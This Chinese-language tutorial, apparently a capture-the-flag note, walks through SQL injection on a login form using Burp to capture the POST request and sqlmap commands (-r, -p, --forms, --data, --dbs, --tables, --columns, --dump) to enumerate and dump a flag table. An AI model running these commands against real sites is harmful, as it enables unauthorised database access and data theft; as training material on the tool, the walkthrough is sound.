企业🤖AI智能体构建引擎,智能编排和调试,一键部署,支持私有化部署方案 广告
一:三种方式 sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数" 二:演示 (1)目标地址http:// www.xxx.com /login.asp (2)打开brup代理。 (3)点击表单提交 (4)burp获取拦截信息(post) (5)右键保存文件(.txt)到指定目录下 (6)运行sqlmap并执行如下命令: // -r表示加载文件(及步骤(5)保存的路径),-p指定参数(即拦截的post请求中表单提交的用户名或密码等name参数) sqlmap -r okay.txt -p username  //获取所有数据库 python sqlmap.py -r okay.txt --dbs ![](https://img.kancloud.cn/17/f2/17f25a759b5397fcb3431e2caece96fa_374x86.png) python sqlmap.py -r okay.txt -D skctf_flag --tables ![](https://img.kancloud.cn/f2/9d/f29ddd5d6c98da1eeab78984670def50_331x171.png) python sqlmap.py -r okay.txt -D skctf_flag -T fl4g --columns ![](https://img.kancloud.cn/06/5f/065f6b1873226b07a857e525fe116186_422x215.png) python sqlmap.py -r a.txt -D skctf_flag -T fl4g -C "skctf_flag" --dump ![](https://img.kancloud.cn/3c/9f/3c9fcf3eaa420d925f0f11a6b707da0f_442x132.png) (7)自动获取表单**:**\--forms自动获取表单 sqlmap -u www.xx.com/login.asp --forms (8)指定参数搜索:--data sqlmap -u www.xx.com/login.asp --data "username=1"